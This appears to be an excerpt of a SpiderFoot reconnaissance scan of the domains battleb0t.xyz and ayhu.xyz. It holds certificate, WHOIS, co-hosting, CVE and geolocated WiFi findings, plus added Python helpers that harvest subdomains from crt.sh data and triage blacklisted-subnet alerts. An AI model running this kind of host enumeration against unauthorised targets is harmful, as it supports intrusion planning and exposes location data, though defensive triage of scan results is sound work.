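SCAN_TIME = datetime(2023, 5, 12, 3, 3, 16)

# Six of the thirteen crt.sh entries from that row's Source Data cell, copied
# verbatim (constructed test input, not a live crt.sh query). SpiderFoot wrote
# the cell as a Python 2 repr, so json.loads() rejects it; ast.literal_eval()
# parses it without evaluating any code.
CRT_SH_SOURCE_DATA = r"""[
{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170},
{u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885},
{u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679},
{u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589},
{u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729},
{u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}
]"""


def parse_crtsh_export(source_data):
    """Parse the Source Data cell into a list of crt.sh entry dicts."""
    entries = ast.literal_eval(source_data)
    if not isinstance(entries, list) or not all(isinstance(e, dict) for e in entries):
        raise ValueError("expected a list of crt.sh entry dicts")
    return entries


def dedupe_by_serial(entries):
    """crt.sh logs the precertificate and the final certificate as separate
    entries (different 'id', identical 'serial_number'); keep one per serial."""
    by_serial = {}
    for entry in entries:
        by_serial.setdefault(entry["serial_number"], entry)
    return list(by_serial.values())


def harvest_hostnames(entries):
    """Concrete names from every cert's SAN list ('name_value' is newline-joined).
    Wildcards are dropped: '*.ayhu.xyz' is not a resolvable host."""
    names = set()
    for entry in entries:
        for name in entry["name_value"].split("\n"):
            name = name.strip().lower()
            if name and not name.startswith("*."):
                names.add(name)
    return sorted(names)


def valid_at(entries, when):
    """Entries whose validity window covers 'when' (crt.sh timestamps are UTC)."""
    return [e for e in entries
            if datetime.fromisoformat(e["not_before"]) <= when <= datetime.fromisoformat(e["not_after"])]


def summarize(source_data, when=SCAN_TIME):
    """One dict per scan row: cert count, exposed hostnames, certs current at scan time."""
    entries = dedupe_by_serial(parse_crtsh_export(source_data))
    return {
        "certificates": len(entries),
        "hostnames": harvest_hostnames(entries),
        "current_serials": sorted(e["serial_number"] for e in valid_at(entries, when)),
        "issuers": sorted({e["issuer_name"] for e in entries}),
    }


if __name__ == "__main__":
    for key, value in summarize(CRT_SH_SOURCE_DATA).items():
        print(f"{key}: {value}")
```

On the six sample entries this yields four distinct certificates, eight concrete hostnames (the cPanel service names among them), and two certificates still valid at 03:03:16 on 2023-05-12, one of which lapses about two hours later; the hostnames are the list worth feeding back into DNS resolution and the "Internet Name - Unresolved" check.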
| 2023-05-12 03:24:21 | Linked URL - Internal | No | Web Spider | 5 | 0 | 2 | 0 | None | https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU | https://ayhu.xyz/lol.html |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Allstate 2.4G (Net ID: 00:02:6F:F8:0A:40) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:00:49 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.67): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
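The five "Blacklisted IP on Same Subnet" rows above are the only findings in this section marked risky, and all of them rest on other addresses in 188.114.96.0/24 and 188.114.97.0/24 appearing in Project Honey Pot, every one with visitor type "Search Engine", the category Project Honey Pot assigns to recognised crawlers rather than to harvesters or comment spammers. A flagged neighbour in a shared anycast or CDN range also says little about the scanned host, since unrelated tenants sit behind the same addresses. The following is an added triage example, not SpiderFoot's code: it parses the five rows (copied above as test input), checks that each flagged IP really lies inside the subnet it was attributed to, groups hits per /24, and marks the finding as a weak signal when the block is on an operator-supplied list of shared ranges (assumed here to contain 188.114.96.0/20; confirm against RIR/ASN data for your own scan) or when every hit carries the crawler classification.

```python
import ipaddress
import re

# (Data, Source Data) cells of the five 'Blacklisted IP on Same Subnet' rows
# above, copied verbatim with the cell's line breaks written as \n
# (constructed test input).
HONEYPOT_ROWS = [
    ("Honeypotproject (188.114.96.224): Search Engine\nLast Activity: 0 days ago\nThreat Level: 29", "188.114.96.0/24"),
    ("Honeypotproject (188.114.96.43): Search Engine\nLast Activity: 0 days ago\nThreat Level: 29", "188.114.96.0/24"),
    ("Honeypotproject (188.114.96.96): Search Engine\nLast Activity: 0 days ago\nThreat Level: 29", "188.114.96.0/24"),
    ("Honeypotproject (188.114.97.40): Search Engine\nLast Activity: 0 days ago\nThreat Level: 29", "188.114.97.0/24"),
    ("Honeypotproject (188.114.96.67): Search Engine\nLast Activity: 0 days ago\nThreat Level: 29", "188.114.96.0/24"),
]

# Assumption: an operator-maintained list of netblocks known to be shared
# anycast/CDN space, where a blacklisted neighbour says nothing about the
# target. 188.114.96.0/20 is listed because the rows above fall in it; verify
# it against RIR/ASN data for your own scan before relying on it.
SHARED_RANGES = [ipaddress.ip_network("188.114.96.0/20")]

HIT_RE = re.compile(
    r"Honeypotproject \((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\): (?P<category>[^\n]+)\n"
    r"Last Activity: (?P<days>\d+) days ago\n"
    r"Threat Level: (?P<threat>\d+)"
)


def parse_honeypot_hit(data, source):
    """Parse one row; reject rows whose flagged IP is not inside the subnet
    SpiderFoot attributed it to (a sign of a mangled export)."""
    match = HIT_RE.search(data)
    if not match:
        raise ValueError(f"unrecognised Honeypot Checker text: {data!r}")
    netblock = ipaddress.ip_network(source, strict=True)
    ip = ipaddress.ip_address(match["ip"])
    if ip not in netblock:
        raise ValueError(f"{ip} is not in {netblock}")
    return {"ip": str(ip), "netblock": str(netblock), "category": match["category"],
            "days_since_activity": int(match["days"]), "threat_level": int(match["threat"])}


def triage(rows, shared_ranges):
    """Group hits per netblock and decide whether the finding deserves a look.
    Two reasons to downgrade: the block is shared infrastructure, or every hit is
    Project Honey Pot's 'Search Engine' visitor type (a recognised crawler)."""
    per_block = {}
    for data, source in rows:
        hit = parse_honeypot_hit(data, source)
        block = per_block.setdefault(hit["netblock"], {"hits": [], "categories": set()})
        block["hits"].append(hit)
        block["categories"].add(hit["category"])
    result = {}
    for netblock, block in per_block.items():
        net = ipaddress.ip_network(netblock)
        shared = any(net.subnet_of(r) for r in shared_ranges)
        crawler_only = block["categories"] == {"Search Engine"}
        neighbors = sorted({h["ip"] for h in block["hits"]}, key=ipaddress.ip_address)
        result[netblock] = {
            "neighbors": neighbors,
            "neighbor_count": len(neighbors),
            "max_threat": max(h["threat_level"] for h in block["hits"]),
            "categories": sorted(block["categories"]),
            "shared_infra": shared,
            "weak_signal": shared or crawler_only,
        }
    return result


if __name__ == "__main__":
    for netblock, summary in triage(HONEYPOT_ROWS, SHARED_RANGES).items():
        print(netblock, summary)
```

With the assumed shared-range list both /24s come out as weak signals; with an empty list they still do, because every hit is a crawler classification. The neighbour count (four in 188.114.96.0/24, one in 188.114.97.0/24) is what to compare against the Honeypot Checker rows of other scans before deciding to escalate.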
| 2023-05-12 02:46:49 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | cloudwaysapps.com | 64.226.81.43 |
| 2023-05-12 03:00:51 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 000.ovh | 185.199.111.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | phi (Net ID: 00:06:B1:2D:D2:D1) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:57:44 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 10, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://develop--lifecard-basic.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5672:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5672:120:WilError_01"\n "Local\\SM0:5580:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:5580:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:5672:120:WilError_01"\n "Local\\SM0:5672:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5676:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://develop--lifecard-basic.netlify.app/"\n Pattern match: "https://develop--lifecard-basic.netlify.app"'}, {u'category': 
u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1005', u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005672-00000BE4-12014391507\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\966b4622-5189-4715-ace7-32781c511d01" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005672-00000BE4-26614537913\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\d0313995-11ad-4fbc-ac47-fb134ed2e3e0" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005672-00000BE6-26619492266\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005672-00000BE6-50648112176\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Bookmarks" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005672-00000BE2-65382453450\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Bookmarks.msbak" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005672-00000BE2-65382453450\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007352-00000BE4-161466459\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\reports" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007352-00000BE4-164012001\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\attachments" 
(Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007352-00000BE4-166951574\n "--type=crashpad-handler "--user-data-dir=%LOCALAPPDATA%\\Microsoft\\Edge\\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=103.0.5060.53 "--annotation=exe=%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=103.0.1264.37 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd8,0x7ff9146190b8,0x7ff9146190c8,0x7ff9146190d8" (Indicator: "microsoft\\edge\\user data") in Source: msedge.exe'}], u'threat_level': 0, u'size': None, u'job_id': u'637eba44d524a07f2576099e', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'suspicious_identifiers': [], u'attck_id': u'T1005', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Data from Local System', u'informative_identifiers': [], u'tactic': u'Collection', u'informative_identifiers_count': 0, u'suspicious_identifiers_count': 1}], u'certificates': [], u'hosts': [u'34.148.97.127'], u'sha256': u'025407f1cd178ff7c81c5b101ca381ce72f5056e2ae85a03b5184adbb9151083', u'sha512': u'68475e41725f628b8af418c7f8123130b34e9b9627d9378d7adbfd41d9af4bbb930e36e05c418c7477a17d81df67a8d6f0fcba60f9094f21b33f41363ec82ae3', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://develop--lifecard-basic.netlify.app/', u'submission_id': u'637eba44d524a07f2576099f', u'created_at': u'2022-11-24T00:26:44+00:00', u'filename': None}], u'analysis_start_time': u'2022-11-24T00:30:54+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], 
u'total_signatures': 4, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'3633daa5dd9513875472344179c1fb32', u'network_mode': u'default', u'processes': [], u'sha1': u'a04be0e448fafc36381b730c03d0fd075779e81d', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 10 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 34.148.97.127 |
| 2023-05-12 02:54:54 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c5a6f150a072cb8-ORD"]} | 2a06:98c1:3121::1 |
| 2023-05-12 02:56:50 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:aa:0b:fb:f5:72:57:f7:90:57:35:0a:22:0c:3a:41:5a:d1
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:48:35 2023 GMT
Not After : Apr 14 17:48:34 2023 GMT
Subject: CN=funny-face-pictures.nom-nom.link
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:bd:1c:66:69:41:70:5a:26:6b:f9:5d:75:98:b4:
8f:50:49:99:4a:13:c7:34:5d:07:06:03:17:45:62:
35:db:24:d3:13:a5:28:c9:bc:9e:26:03:0e:28:c7:
d0:92:34:41:85:ff:c9:ec:be:04:85:ca:56:f3:8d:
46:7d:03:91:0a
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D0:E0:AC:A3:54:40:02:9F:45:F6:D9:F1:FF:DC:7A:58:77:FF:5A:B0
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny-face-pictures.nom-nom.link, DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 14 18:48:35.447 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:23:7B:64:B6:2C:AC:F5:E8:CA:03:17:B5:
C8:52:1F:78:4E:9E:45:71:9E:BA:A5:B9:28:E2:F6:98:
5C:9C:55:4D:02:21:00:C5:7A:6D:7B:D9:FC:31:BE:EE:
D2:45:60:40:E8:F3:98:F6:00:28:61:5C:51:F5:50:E2:
F1:BC:67:67:34:47:34
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 14 18:48:35.442 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:77:EF:CC:3A:63:43:C6:E6:6C:CD:36:4F:
64:00:42:35:30:9C:67:0E:E7:F4:15:29:43:E9:0B:EB:
EA:B5:DD:47:02:20:43:3C:D6:F2:D6:6A:25:2C:8C:A9:
19:78:E2:12:1F:E6:13:A2:C8:59:FC:58:1D:CC:B7:3C:
FE:5E:08:B2:25:67
Signature Algorithm: sha256WithRSAEncryption
26:53:65:d8:0f:da:9d:5c:c2:89:7f:e9:59:db:82:df:21:01:
bc:a3:b0:96:ec:a1:79:53:d3:6d:a2:73:a4:48:f5:f3:60:37:
2f:d6:c2:bc:34:d6:5c:7b:52:5d:a2:86:c6:22:cc:0d:88:a5:
09:9e:b7:e0:33:0e:94:6a:31:dd:1a:ce:0b:4a:1b:35:81:e8:
18:b8:67:35:7b:c5:55:5b:fa:24:e1:61:d8:fc:4c:fb:0b:69:
6d:b7:e9:88:a8:d9:f4:30:10:9e:d7:62:ac:85:d6:f5:b8:e4:
d1:e1:dd:33:91:22:79:d9:d1:27:2a:78:63:a1:7e:92:44:93:
5d:7f:b9:50:5b:7c:41:db:0c:39:77:23:a9:bf:96:10:23:77:
56:f9:ce:90:f2:c8:df:fc:44:22:77:ff:3a:73:64:da:f9:9d:
43:b8:69:0a:60:9d:7e:36:25:20:ea:05:1d:9b:94:cd:ee:68:
aa:a6:47:3a:63:73:de:dd:31:b0:d6:03:9e:95:3c:99:1c:f5:
c1:10:0c:3b:9b:5b:bb:2b:91:5b:f8:0b:8e:c1:0a:80:b1:82:
3c:fb:af:ea:e3:db:58:02:64:c3:ab:7a:c9:4d:e2:fc:10:3c:
ec:06:e0:99:ff:1b:90:aa:e6:ba:48:4e:20:e1:c2:59:01:96:
cd:48:36:11
|
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Apple Network 079699 (Net ID: 00:02:2D:07:96:99) | 37.7642, -122.3993 |
| 2023-05-12 02:45:34 | Email Gateway (DNS MX Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | route1.mx.cloudflare.net | battleb0t.xyz |
| 2023-05-12 03:12:16 | Co-Hosted Site - Domain Whois | No | Whois | 3 | 0 | 5 | 0 | None | Domain Name: ECASH-PAY.COM
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15Z
Creation Date: 2021-04-26T06:58:38Z
Registry Expiry Date: 2024-04-26T06:58:38Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: ecash-pay.com
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15.08Z
Creation Date: 2021-04-26T06:58:38.00Z
Registrar Registration Expiration Date: 2024-04-26T06:58:38.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T10:12:16.55Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | ecash-pay.com |
| 2023-05-12 03:03:27 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | nwapi.battleb0t.xyz |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.203): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 5526 7041 (Net ID: 00:00:C5:B5:6E:E5) | 41.8781, -87.6298 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.217): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:13:02 | Blacklisted Affiliate IP Address | Yes | Threat Jammer | 0 | 1 | 3 | 0 | None | Threat Jammer - Risk score: 40 (MEDIUM)
https://threatjammer.com/info/87.248.157.93 | 87.248.157.93 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Belkin_G_Wireless_ (Net ID: 00:1C:DF:B6:B6:F1) | 32.8608, -79.9746 |
| 2023-05-12 03:31:34 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@gmo.jp | Domain Name: AYHA.XYZ
Registry Domain ID: D293590239-CNIC
Registrar WHOIS Server: whois.discount-domain.com
Registrar URL: http://www.onamae.com
Updated Date: 2022-04-30T16:37:38.0Z
Creation Date: 2022-04-25T16:34:12.0Z
Registry Expiry Date: 2024-04-25T23:59:59.0Z
Registrar: GMO Internet Group, Inc. d/b/a Onamae.com
Registrar IANA ID: 49
Domain Status: ok https://icann.org/epp#ok
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registrant Organization: Whois Privacy Protection Service by onamae.com
Registrant State/Province: Tokyo
Registrant Country: JP
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.GM111.PARKLOGIC.COM
Name Server: NS2.GM111.PARKLOGIC.COM
DNSSEC: unsigned
